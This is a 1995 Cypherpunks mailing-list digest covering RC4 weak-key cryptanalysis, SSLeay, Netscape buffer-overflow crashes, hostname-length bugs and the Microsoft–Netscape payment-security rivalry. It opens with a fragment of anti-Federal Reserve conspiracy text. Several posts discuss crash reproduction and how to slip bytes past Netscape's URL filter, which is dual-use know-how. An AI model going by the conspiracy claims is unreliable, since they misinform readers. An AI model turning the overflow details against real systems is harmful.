Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious. TELL THE PEOPLE America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. Interna- tional bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare. Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At- lanta Georgia, said: "This is a staggering thought. We are completely dependent on the com- mercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are pros- perous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absur- dity of our hopeless position is almost incredible, but there it is. It is the most important subject intelligent persons can investigate and re- flect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon." PRIVATE BANKING In California a very private "non-bank" has been operating successfully for fifteen years. It caters for accounts in gold or Federal Reserve Notes. It is completely private and doesn't report to anyone. It pays in- terest on both gold and Federal Reserve Note balances. Ideally, we need to establish a network of private banks throughout the country, and even- tually throughout the rest of the world. See Chapter Twelve. From eay at mincom.oz.au Thu Sep 28 00:04:50 1995 From: eay at mincom.oz.au (Eric Young) Date: Thu, 28 Sep 95 00:04:50 PDT Subject: X.509, S/MIME, and evolution of PGP In-Reply-To: <199509272223.PAA13812@ix7.ix.netcom.com> Message-ID: On Wed, 27 Sep 1995, Bill Stewart wrote: > 6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough > related code in SSLeay to steal to help implement it? I am cleaning up and documenting the routines right now, but yes, it is possible to implement not only a CA but all the other stuff you mention. I have finished digital envelope routines (ala Sign, Verify, Seal and Open). I have the full functionality of RSAref plus support for about umpteen differnt cipher in umpteen different modes (well DES, IDEA and RC4 in a total of 13 different modes, I use structure pointers to specify ciphers so only the ciphers used are linked in and it is also trivial for applications to specify new ciphers to use). Everything needed to implement PEM is there, to do S/MIME I've got to do PKCS-7 but that is just a parsing and packageing problem which I will do (when I get time) for SSL v3. I'm also about to redo my X509_get_certificate routine so that an application can 'push' 'methods' onto the system used to lookup certificates. I need to be able to look them up via an alias, subject X509 DN, and via Issuer and ID. If I get time I'll probably put in a demo 'method' that will talk to a socket/host and ask for certificates (proably a simple perl server at the other end). I'm taking the view that if I can put hooks into the library for other people to put in routines to retrieve certificates/CRL's I will not have to do all the work :-). I just have to document everything so other people can have a play :-) eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From cort at ecn.purdue.edu Thu Sep 28 00:11:51 1995 From: cort at ecn.purdue.edu (cort) Date: Thu, 28 Sep 95 00:11:51 PDT Subject: NIS library code exposure (Unix network exposure) In-Reply-To: <199509280613.BAA21957@en.ecn.purdue.edu> Message-ID: <199509280711.CAA27138@en.ecn.purdue.edu> > [....] > > > Do you have any daemons that run as root and do networking? Are you > > sure that all of them check the length of the host name before passing > > it to gethostbyname? > > [....] > > On Linux: > ping [huge host name] works > ftp [huge host name] works > finger [huge host name] works > nslookup [huge host name] ... CRUNCH (Segmentation fault) > Ouch.....! On Linux: rsh [huge host name] crashes bad... (file system now corrupted) The above claims for ping, ftp and finger may be dependent on how huge is huge. rsh took a very large number (I'm guessing 10 lines, 800 characters) before crashing. Huge was not this huge for the previous tests. rsh is usually suid root. I must quit experimenting now.... and repair my system. Crypto relevance: little.... some hack relevance, lots of general system/network security relevance Cort. From stewarts at ix.netcom.com Thu Sep 28 01:39:32 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Sep 95 01:39:32 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509280839.BAA02982@ix6.ix.netcom.com> At 11:44 PM 9/27/95 -0400, Futplex wrote: >However, a certain amount of common sense will go a long way in avoiding ugly >incidents. To put it simply, "look before you leap". Before you click on a >link, look at the status bar at the bottom of the Netscape window (in the >Unix version at least) that displays the URL of the link under the pointer. One of the later versions of the hack hid the large href inside the page as an IMG; the URL for the page looked mostly harmless (other than being named "bug2" or "hack2" :-); I think it was Ray's. Blowed up real good. "Push to test" ..... "Release to detonate" >"What if you knew her, and found her dead on the ground ? > How can you run when you know ?" -Neil Young Well, Nixon's not coming any more, but this is it, we're on our own... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Thu Sep 28 01:40:08 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Sep 95 01:40:08 PDT Subject: Looking for advice. Message-ID: <199509280839.BAA03015@ix6.ix.netcom.com> At 09:58 PM 9/27/95 -0700, you wrote: >For two programs communicating via TCP/IP and exchanging authentication >information, I want to make sure that the authentication info, (user's >name and password,) doesn't pass in the clear. I can think of a few >ways to handle this. > >1) Encrypt via shared key using symetric encryption. > This works but key management is a problem. >2) Encrypt via public keys using public key encryption. > There's licensing issues, and how do you generate public and private > pairs for all of the programs? That could be a lot of primes! >3) The "server" could keep user names and passwords stored as hashed values. > That way the "client" could do a hash (MD5?) before sending it. > This has the drawback of the server not having access to the unhashed > values...if it needs that access this method won't work. [Perry Metzger often has good comments about the order of doing things in.] Are you planning to encrypt your sessions, or not? What threats are you worried about? What threats are you aware of but not worried about? How much opportunity do the users of the programs have to set up communications beforehand? Is this one-shot, or will a given client and server do a lot of repeat business? Are you concerned about privacy from machine to machine, or also from user to user? Are you worried about man-in-the-middle attacks? Are you worried about protecting the user's name, or only their password? Are you willing to buy hardware, or do you want software-only? How critical is setup speed? How slow are your processors? Are you worried about your TCP sessions getting hijacked once you've done the authentication? For some applications, Diffie-Hellman is a good answer - the basic protocol doesn't do authentication, but does do secure key negotiation as long as you either don't have a man-in-the-middle or else have authentication such as digital signatures on your key-parts. Once you've created a shared key by DH, you can then use it to encrypt your session, or at least exchange passwords securely. If you're willing to buy a bit of hardware, there are cryptographic smartcards that let you generate time-varying one-time passwords; some of them are decent. Phil Karn's S/Key technology (ftp-able from and I think patented by Bellcore) takes a nice approach using hash functions - let h^n(m) denote message m cranked through hash function h n times, = h(h(h(...(h(m))...))), where h is a secure one-way hash like MD4 that's tolerably fast. To set up, calculate h^n(m), and store it in the server's password file. When you log in for the first time, the server tells you n-1, you calculate h^(n-1)(m), send it as your password, the server hashes it to get h^n(m), and compares it with the saved value. If it works, the server now saves h^(n-1)(m); the next time it'll ask you for n-2, you give it h^(n-2)(m), the server hashes to get h^(n-1)(m), etc. Obviously you've got to reset after n-1 uses. If you have an environment where you can store secret keys safely on the server, you can use secret-key challenge-response methods effectively - the server sends a random number, and you send back the number, encrypted, or there are variants where you modify the number by 1, with or without timestamps, and maybe the server sends the number encrypted also. If you can't secure a general-use machine, but are able to secure a machine that just does authentication and keep it locked in a room with only network access and power, pretty soon you've invented Kerberos. Do you need separate public keys for each application X user? Depending on what you're trying to authenticate, you could have a public key for the application or even just the machine it runs on, and send passwords encrypted with that; again there are variants with timestamps, random challenges, etc., to deal with issues like replay attacks. Or maybe you can have the server issue random numbers as challenges that you sign with your registered public key. If you do that, though, better have the server sign with _its_ public key also, since you'd probably rather not just go signing any random number anybody hands you. And what if there's a man in the middle there helping you log on...? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From perry at piermont.com Thu Sep 28 01:51:58 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Sep 95 01:51:58 PDT Subject: No Subject In-Reply-To: <199509280611.HAA02214@utopia.hacktic.nl> Message-ID: <199509280851.EAA20863@frankenstein.piermont.com> Whomever you are, could you get this shit out of Cypherpunks? This list is about cryptography, not your ignorance of economics or how banking works. Anonymous writes: > that they do. 95% of all "cash" transactions in the U.S. are by check. > Checks are thus effectively also currency. The banker creates the so- > called "loan" by writing a check or deposit slip, not against actual > money, but against your promise to pay back the loan. The only cost to the > bank is the paper,ink, and a few dollars in salaries and office costs for > each tansaction. It is "check-kiting" on an enormous scale! The profits > are enormous as shown below. [...] From frissell at panix.com Thu Sep 28 03:43:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 28 Sep 95 03:43:55 PDT Subject: It's Wednesday In-Reply-To: <44dcts$b36@tera.mcom.com> Message-ID: On 28 Sep 1995, Jeff Weinstein wrote: > Sure. Its on ftp://ftp.netscape.com/pub/netscape. It has been there > for several hours. Late Wednesday. Of course whoever created the directories/files had his machine date set to *1994* so some of same are date stamped Tuesday September 27 1994. DCF From dl at hplyot.obspm.fr Thu Sep 28 03:51:10 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Thu, 28 Sep 95 03:51:10 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <9509281050.AA15525@hplyot.obspm.fr> Douglas Barnes writes: > Spent too much time last night playing with the Netscape bug; > among other things wrote some code to throw various random binary > URLs at Netscape. Netscape seems prepared to swallow the bait > as long as the URL does _not_ contain characters screened as > follows: > if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) { > This means you can't plant 0x00, 0x22, 0x3e or 0x2f. No, you *can* put 0x22, 0x3e and 0x2f by using respectively " > and / html constructs (&#nnn; nn decimal ascii code) unfortunatly � is not recognized but you can probaly use any number substracted by itself or even short lda#0 (depending on the cpu),...if you need a zero,...(what for ?) I hope this helps too, btw, anywone having contacts on the 8lgm folks? they must have experience with that kind of stuff... Uptodate infos kept on http://hplyot.obspm.fr/~dl/netscapesec/ It seems the anim is working on about every netscape around, except one folk on linux that reported it didn't crash though someone else, on linux too said it crashed... Even if a patch should be availble now, making a demonstration is still interesting IMO [specially when you know that there are still ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP access packages!...] dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Qaddafi ammunition radar Legion of Doom KGB Khaddafi Croatian From jsw at netscape.com Thu Sep 28 03:52:26 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 28 Sep 95 03:52:26 PDT Subject: It's Wednesday In-Reply-To: Message-ID: <9509280348.ZM151@tofuhut> On Sep 28, 6:43am, Duncan Frissell wrote: > Subject: Re: It's Wednesday > > On 28 Sep 1995, Jeff Weinstein wrote: > > > Sure. Its on ftp://ftp.netscape.com/pub/netscape. It has been there > > for several hours. > > Late Wednesday. Of course whoever created the directories/files had his > machine date set to *1994* so some of same are date stamped Tuesday > September 27 1994. They were put up some time between 4 and 6pm PST. As far as I can tell, all of the files are dated in 1995. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From neil at legless.demon.co.uk Wed Sep 27 20:24:06 1995 From: neil at legless.demon.co.uk (Neil Woods) Date: Thu, 28 Sep 1995 04:24:06 +0100 Subject: Ray Cromwell: Another Netscape Bug (and possible security In-Reply-To: <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham" at Sep 25, 95 02:45:26 pm Message-ID: <199509280324.EAA19959@legless.demon.co.uk> > > > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation > > >fault and subsequent coredump. GDB reports nothing useable (stripped > > >executable) > > > > I cannot reproduce this bug on the following platforms: > > > > Solaris 2.5 beta/Netscape 1.1N > > I've reproduced it fine under sol2.4 1.1N. The page > I tested from is http://www.aloha.net/~newsham/test.html. > Simply click on the long test url and core dump. > (You can view source before clicking to see what you > are clicking on if you dont trust me :) > > > Howard Owen hbo at octel.com Octel Communications Corporation 1024/DC671C31 = > Ive tried this url, it does indeed core dump. Just had a quick look at the core. From first impressions, it's a global overwrite. Therefore we're not overwriting a flushed stack frame, so a syslog(3) style exploit is impossible. Global overwrites can be exploited, but due to the scenario we're looking at, I'd consider exploit chances to be very low indeed. Cheers, Neil -- Let the Mystery Be, So Watcha Want, Longing In Their Hearts, Hate My Way, M-Bike, Safari, Uncle June and Aunt Kiyoti, Daisy Dead Petals, Tuff Gnarl. ...like a badger with an afro throwing sparklers at the Pope... -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jya at pipeline.com Thu Sep 28 05:08:27 1995 From: jya at pipeline.com (John Young) Date: Thu, 28 Sep 95 05:08:27 PDT Subject: STT_??? Message-ID: <199509281208.IAA06190@pipe4.nyc.pipeline.com> 9-28-95. W$Japer: "Infighting Unravels Alliance Seeking Standard to Protect Internet Purchases." The consortium brought together such top players as credit-card rivals Visa International and MasterCard International Inc., software titan Microsoft Corp. and Internet upstart Netscape Communications Corp. But this week, the alliance split because of tensions between Visa and MasterCard and their respective technology partners -- Microsoft and Netscape. Regarding Netscape, Mr. Dent of Microsoft said the firm's security deficiencies that have recently come to light have "tainted" electronic commerce on the Internet. Mr. Dent also noted that Microsoft yesterday introduced new security technology, including means to verify a user's identity, that is much stronger than Netscape's. STT_??? (6 kb) From jeffb at sware.com Thu Sep 28 05:33:31 1995 From: jeffb at sware.com (Jeff Barber) Date: Thu, 28 Sep 95 05:33:31 PDT Subject: Hack Microsoft NT C2 Rating? In-Reply-To: <9509272102.AA21900@zorch.w3.org> Message-ID: <9509281232.AA02546@wombat.sware.com> hallam at w3.org writes: > I think that c2 is possibly the limit of orange/red bookishness that is > reasonable to work to. It is not a trivial level of security however, UNIX > despite all the claims has never been shipped as C2 secure as standard by a > mainstream vendor. Even requirements involving trivial effort but which are > extreemly important such as the writing of a users security guide have never > been taken seriously on any of the UNIX platforms on which I have worked. A slight correction: SCO shipped the C2 version of their Open Desktop 1.1 as the standard (in fact, only) version a few years back. The howls of outrage from their customer base (due to the non-standard-Unix behavior) caused them to back off in the next major release. Last time I tried to install their software, C2 had been made an option. (Of course, AFAIK, they never actually completed a C2 evaluation.) -- Jeff From adam at bwh.harvard.edu Thu Sep 28 06:09:58 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 28 Sep 95 06:09:58 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) Message-ID: <199509281309.JAA12017@bwh.harvard.edu> This came across the SSL mailing list. Anyone know Taher's position on key-escrow? | From ssl-talk-request at netscape.com Thu Sep 28 01:54:10 1995 | Resent-Date: Tue, 26 Sep 1995 09:34:09 -0700 | Date: Tue, 26 Sep 1995 09:30:03 -0700 | Message-Id: <199509261630.JAA06021 at neon.netscape.com> | X-Sender: elgamal at pop.mcom.com | X-Mailer: Windows Eudora Version 2.0.3 | Mime-Version: 1.0 | Content-Type: text/plain; charset="us-ascii" | To: John Droge , ssl-talk at netscape.com | From: elgamal at netscape.com (Taher ElGamal) | Subject: Re: Crypto | Resent-Message-ID: <"BFRph1.0.yW1.jg2Qm"@neon> | Resent-From: ssl-talk at netscape.com | X-Mailing-List: archive/latest/987 | X-Loop: ssl-talk at netscape.com | Precedence: list | Resent-Sender: ssl-talk-request at netscape.com | | Can I get some detailed info about your company and products-- We are | thinking about this. | | taher | | At 11:34 PM 9/25/95 -0700, John Droge wrote: | >Dear Sirs: | > | >My company developed and currently produces the Fortezza Crypto | >Card for the Government. What plans to you have to support this | >standard? | > | >Sincerely, | >John Droge | >Vice President | >Program Development | >Mykotronx, Inc. | >357 Van Ness Way, Ste. 200 | >Torrance, CA 90501 | >(310) 533-8100 | > | > | > | > | > | > | Taher Elgamal elgamal at netscape.com | Chief Scientist | Netscape Comm Corp., 501 E Middlefield Road, Mountain View Ca 94043. | (415) 528 2898 (Tel), (415) 528 4122 (Fax) | | From jya at pipeline.com Thu Sep 28 06:15:39 1995 From: jya at pipeline.com (John Young) Date: Thu, 28 Sep 95 06:15:39 PDT Subject: 25 Crays a Year to Break STT Message-ID: <199509281315.JAA11395@pipe4.nyc.pipeline.com> Financial Times, September 28, 1995, p.1. Rivalry for Internet Security Grows By Louise Kehoe in San Francisco The Internet rivalry between Microsoft, the world's largest software company, and Netscape Communications increased yesterday when they announced competing encryption technology intended to ensure the security of financial transactions over the global computer network. Mr James Clark chairman of Netscape, the leading supplier of browser software that enables personal computer users to "surf" the Internet, also revealed the company had turned down a move by Microsoft to take a minority stake in Netscape earlier this year, before Netscape's public offering. Microsoft's encryption technology, developed with Visa International the credit card processing organisation, is intended to solve Internet security problems which have become a serious barrier to electronic commerce. Recent incidents, including the hacking of supposedly secure Internet software developed by Netscape, have heightened concerns about sending sensitive data such as credit card numbers over the Internet. Microsoft said its Secure Transaction Technology (STT), was designed to provide a much higher level of security for credit card transactions on the Internet. Netscape's general purpose encryption system uses a 40 or 128-bit electronic "key", while STT will use 2,000-bit keys. "By Christmas of 1996 you will be able to shop on the Internet to your heart's content, without even thinking about security," said Mr Warren Dent, Microsoft director of business development for consumer systems. Although no encryption system was totally secure, Mr Dent estimated it would take "25 Cray supercomputers a year" to break the STT codes. Netscape, however, said a new version of its Navigator software, which will become available next week will provide the same level of security. Netscape's "Secure Courier" technology has been developed in conjunction with MasterCard, Visa's credit card rival. To encourage widespread adoption of STT, Microsoft and Visa are making its technical specifications available at no charge to third parties to allow them to develop software. Netscape said Microsoft is expecting to charge transaction fees each time the STT technology is used. Commercial software products incorporating STT are expected to be available by April, Microsoft said. Netscape says Secure Courier will be available sooner. [End] From andrewr at vironix.co.za Thu Sep 28 07:28:45 1995 From: andrewr at vironix.co.za (Andrew Roos) Date: Thu, 28 Sep 95 07:28:45 PDT Subject: Cryptanalysis of RC4 - Preliminary Results Message-ID: <9509281628.aa25754@herman.vironix.co.za> -----BEGIN PGP SIGNED MESSAGE----- Hi c'punks & sci.cryptites About a week ago I posted a message about weak keys in RC4. This is an update on the results of my continued 4am sessions with RC4 and shows that certain weak keys lead to an almost-feasible known plaintext attack on the cipher (well, about as feasible as the differential attack on DES, shall we say). The attack is based on two particularly interesting three-byte key prefixes which have a high probability of producing PRNG sequences which start with a known two-byte sequence. The prefixes are: 1. Keys starting with "00 00 FD" which have a 14% probability of generating sequences which start "00 00". 2. Keys starting with "03 FD FC" which have a 5% probability of generating sequences which start "FF 03". Note that the expected frequency of any two-byte output sequence is 1 in 65536 or about 0.0015%, so these key prefixes are highly unusual. I won't go into the reasons why in this post, since it follows the same reasoning as my last post, but these prefixes are special in that they have a high probability of initializing the RC4 state table in such a way that the first two generated bytes depend only on the first three entries in the state table. This observation is the basis for a simple known-plaintext attack which reduces the effective key space which you need to search to have a 50% probability of discovering a key by about 11.2 bits. The down side is that you need "quite a few" known plaintexts to make the attack feasible. It works as follows: 1. Collect a large number of known plaintexts (and hence known generator sequences). 2. Discard generator sequences which do not start with "00 00" or "FF 03". 3. For generator streams starting "00 00", search all keys which begin with "00 00 FD". 4. For generator streams staring "FF 03", search all keys which begin with "03 FD FC". 5. Keep going until you find a key :-) Clearly this attack will only discover a small fraction of the keys. However since most generator sequences are discarded without being searched, and for those which are searched the search is 2^24 smaller than would be required to search the entire keyspace, the number of trials required to determine a key is significantly lower than for brute force alone. Enough of an intro, here are the relevant results. Forgive my simplistic approach to maths, I'm a philosopher-come-software developer, not a mathematician. I've run the relevant simulations with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two different PRNGs. For the sake of consistency with my earlier paper I'll use the figures gathered for 80-bit keys (this seems to be RSA's preferred key length for RC4), but there are no significant differences for other key lengths. The PRNG used for these tests was L'Ecuyer's 32-bit combined linear congruential generator as described in "Applied Cryptography" p. 349. (a) Out of one million trials, keys starting with "00 00 FD" generated sequences starting "00 00" 138217 times, and keys starting with "03 FD FC" generated output sequences starting "FF 03" 50490 times. (b) Out of ten million trials, arbitrary pseudo-random keys generated sequences starting with "00 00" 446 times, and sequences starting with "FF 03" 146 times. (Note the abnormally high incidence of "00 00"; the expected mean is 152.8). Suppose we have the output stream generated by a randomly chosen key. The chance that it will start with either "00 00" or "FF 03", and that we will therefore search it, is: (446 + 146) / 1e7 = 5.92e-5 The chance that it starts with "00 00" and was generated by a key starting with "00 00 FD", or that it starts with "FF 03" and was generated by a key starting "03 FD FC" - i.e. the chance that we will search it and be rewarded for our efforts - is: (138217 + 50490)/(1e6 * 2^24) = 1.12e-8 The total number of plaintexts required for a 50% chance that we will discover one of the keys is: log(0.5)/log(1 - 1.12e-8) = 61 900 000 Well I did say "quite a few" plaintexts would be necessary :-) And the number of plaintexts which you expect to search in order to find the "right" one is: 61 900 000 * 5.92e-5 = 3665 Since the total key length is 80 bits, and we are "guessing" 24 of these, each search requires 2^56 trials. Hence the total number of trials for a 50% chance of discovering a key is: 3665 * 2^56 = 2.64e20 = 2 ^ 67.8 Since brute search alone would require 2^79 trials for a 50% chance of determining the key, this reduces the number of trials by 2^11.2. The results are essentially identical for all the key lengths I have tried, and in each case reduce effective key length by about 11.2 bits. So, for example, a 64-bit key would normally require 2^63 trials for 50% chance of solution; this attack reduces the number of trials to 2^51.8 at the cost of requiring 62 million known plaintexts. I'm still running simulations to check my maths, and although initial results are encouraging, I don't have enough data for it to be statistically relevant yet (generating all these sets of 62 million known streams takes time...) So consider this preliminary (again), and I'll post the results of my simulations when I have enough data. Andrew ________________________________________________________________ Andrew Roos // C++ programmers have class (but not much inheritance) PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26 Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK 6xQ/Zy8JpE8= =BdMn -----END PGP SIGNATURE----- From rah at shipwright.com Thu Sep 28 07:53:17 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 28 Sep 95 07:53:17 PDT Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers Message-ID: --- begin forwarded text From: zurko at osf.org (Mary Ellen Zurko) Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers To: www-buyinfo at allegra.att.com Date: Thu, 28 Sep 95 9:59:45 EDT Cc: zurko at osf.org (Mez) Mailer: Elm [revision: 70.85] CALL FOR PAPERS 1996 IEEE Symposium on May 6-8, 1996 Security and Privacy Oakland, California sponsored by IEEE Computer Society Technical Committee on Security and Privacy in cooperation with The International Association for Cryptologic Research (IACR) Since 1980, the Symposium on Security and Privacy has been the premier forum for presenting developments in computer security and for bringing together researchers and practitioners in the field. This year, we seek to build upon this tradition of excellence by re-emphasizing work on engineering and applications as well as theoretical advances. We also seek to broaden the scope of the Symposium by introducing additional topics. We want to hear not only about new theoretical results, but also about work in the design and implementation of secure systems and work on policy relating to system security. We are particularly interested in papers on policy and technical issues relating to privacy in the context of the Information Infrastructure, papers on securing unsecure applications and operating systems, papers that relate software and system engineering technology to the design of secure systems, and papers on hardware and architectural support for secure systems. The symposium will focus on technical aspects of security and privacy as they arise in commercial and industrial applications, as well in government and military systems. It will address advances in the theory, design, implementation, analysis, and application of secure computer systems, and in the integration and reconciliation of security and privacy with other critical system properties such as reliability, performance, and safety. Topics in which papers and panel session proposals are invited include, but are not limited to, the following: Secure systems Privacy Issues Access controls Security verification Network security Policy modeling Information flow Authentication Database security Data integrity Security Protocols Viruses and worms Auditing Biometrics Smartcards Commercial and industrial security Intrusion Detection Security and other critical system properties Distributed systems security Novel applications of cryptography and other security techniques We will continue the session of very brief (5-minute) talks introduced last year. Our goal is to make it possible for us to hear from people who are advancing the field in the areas of system design and implementation, and who would like to present their ideas to the symposium audience but may lack the time and resources needed to prepare a full paper. Submissions for this session will be accepted up to April 2, 1996 to permit us to hear of the most recent developments. Abstracts of these talks will be distributed at the conference. INSTRUCTIONS TO AUTHORS: Send six copies of your paper and/or proposal for a panel session to John McHugh, Program Co-Chair, at the address given below. Papers and panel proposals must be received by November 6, 1995. Papers, which should include an abstract, must not exceed 7500 words. The names and affiliations of the authors should appear on a separate cover page only, as a ``blind'' refereeing process is used. In addition to the paper submission, an ASCII copy of the paper title and abstract should be sent to the Program Co-Chair (mchugh at cs.pdx.edu) by electronic mail. These will be distributed electronically (without author identification) to the entire program committee to aid in the appropriate assignment of referees. Authors must certify prior to December 25, 1995 that any and all necessary clearances for publication have been obtained. Papers must report original work that has not been published previously, and is not under consideration for publication elsewhere. Abstracts, overlength papers, electronic submissions, late submissions, and papers that cannot be published in the proceedings will be rejected without review. Authors will be notified of acceptance by January 16, 1996. Camera-ready copies are due not later than March 4, 1996. Panel proposals should describe, in two pages or less, the objective of the panel and the topic(s) to be addressed. Names and addresses of potential panelists (with position abstracts if possible) and of the moderator should also be included. Panels are not intended to serve as alternate paper sessions and it is expected that, with the possible exception of an overview of the topic area by the panel chair, individual presentations by panel members will be limited to five to ten minutes and that at least one third of the session will be reserved for discussion. Submitters of abstracts for the special session of five-minute talks should submit one page abstracts to John McHugh, Program Co-Chair, at the address given below. The abstract should be one page or less; Email submissions of 30 to 60 lines are preferred. Abstracts must be received by April 2, 1996. Authors will be notified of acceptance or rejection of abstracts by April 16. Submitted abstracts that are accepted will be distributed at the conference. Presenters of five-minute talks are expected to register for the conference. Overtly commercial presentations are inappropriate. The Symposium will also include informal poster sessions where preliminary or speculative material, and descriptions or demonstrations of software, may be presented. Send one copy of your poster session paper to Dale Johnson, at the address given below, by January 31, 1996, together with certification that any and all necessary clearances for presentation have been obtained. Again this year, we will attempt to counsel prospective authors. If you have questions about whether or how to present your work to the symposium, please send email to the Chair (dmj at mitre.org), and we will do our best to assist you. Information about this conference will be also be available by anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web at http://www.cs.pdx.edu/SP96. The program chairs can be reached by email at sp96 at cs.pdx.edu. PROGRAM COMMITTEE Dave Bailey, Galaxy Computer Services, USA Terry Vickers Benzel, TIS, USA Lee A. Benzinger, Loral, USA Debbie Cooper, DMCooper, USA Oliver Costich, Independent Consultant, USA Yves Deswarte, LAAS-CNRS & INRIA, FR Jim Gray, Hong Kong U. of Sci. and Tech, HK Li Gong, SRI, USA Sushil Jajodia, GMU, USA Paul Karger, GTE, USA Carl Landwehr, NRL, USA John McLean, NRL, USA Catherine A. Meadows, NRL, USA Rich Neely, CTA, USA Sylvan S. Pinsky, DoD, USA Mike Reiter, AT&T, USA Sue Rho, TIS, USA Peter Ryan, DRA, UK Tom Schubert, Portland State Univ., USA Stuart Stubblebine, AT&T, USA Elisabeth Sullivan, Sequent, USA Tom Van Vleck, Taligent, USA Vijay Varadharajan, Univ. of Western Sydney, AU Yacov Yacobi, Microsoft, USA Raphael Yahalom, Hebrew University, Israel Mary Ellen Zurko, OSF, USA For further information concerning the symposium, contact: Dale Johnson, General Chair John McHugh, Program Co-Chair The MITRE Corporation Computer Science Department Mailstop A156 Portland State University 202 Burlington Rd P.O. Box 751 Bedford, MA 01730-1420, USA Portland OR 97207-0751, USA Tel: +1 (617) 271-8894 Tel: +1 (503) 725-5842 Fax: +1 (617) 271-3816 Fax: +1 (503) 725-3211 dmj at mitre.org mchugh at cs.pdx.edu Steve Kent, Vice Chair George Dinolt, Program Co-Chair BBN Systems and Technologies Loral WDL Mailstop 13/2a P.O. Box 49041, MS X20 70 Fawcett Street San Jose, CA 95161-9041 Cambridge, MA 02138 Tel: +1 (408) 473-4150 Tel: +1 (617) 873-6328 Fax: +1 (408) 473-4272 Fax: +1 (617) 873-4086 dinolt at wdl.loral.com kent at bbn.com Charles Payne, Treasurer Secure Computing Corporation 2675 Long Lake Road Roseville, MN 55113 Tel: +1 (612) 628-1594 Fax: +1 (612) 628-2701 cpayne at sctc.com Peter Ryan, European Contact Jim Gray, Asia/Pacific Contact Defence Research Agency Department of Computer Science Room NX17 Hong Kong Univ. of Science & Technology St Andrew's Rd Clear Water Bay, Kowloon, Hong Kong Malvern Tel: +852 358-7012 Worcs WR14 3PS,UK Fax: +852 358-1477 Tel +44 (0684) 895845 gray at cs.ust.hk Fax +44 (0684) 894303 ryan at rivers.dra.hmg.gb --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at piermont.com Thu Sep 28 08:11:07 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Sep 95 08:11:07 PDT Subject: Hack Microsoft In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com> Message-ID: <199509281510.LAA21039@frankenstein.piermont.com> John Young writes: > 9-28-95. W$Japer: > > Regarding Netscape, Mr. Dent of Microsoft said the > firm's security deficiencies that have recently come to > light have "tainted" electronic commerce on the > Internet. Thats almost an invitation to hack Microsoft's web products, isn't it? (Anyone from Netscape care to join in the fun?) Perry From jamesd at echeque.com Thu Sep 28 08:33:05 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 28 Sep 95 08:33:05 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: <199509281532.IAA25269@blob.best.net> At 12:28 PM 9/27/95 -0400, Travis Corcoran wrote: >A question: in a situation like this one, where an individual signed a >message with a key then did not make a key with the return address of >his message available either through his .plan, or a keysever (the two >de facto standards), what next step -if any- do people think is more >appropriate than sending mail to the individual asking them for a copy >of the key ? Keep up the good work. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From ses at tipper.oit.unc.edu Thu 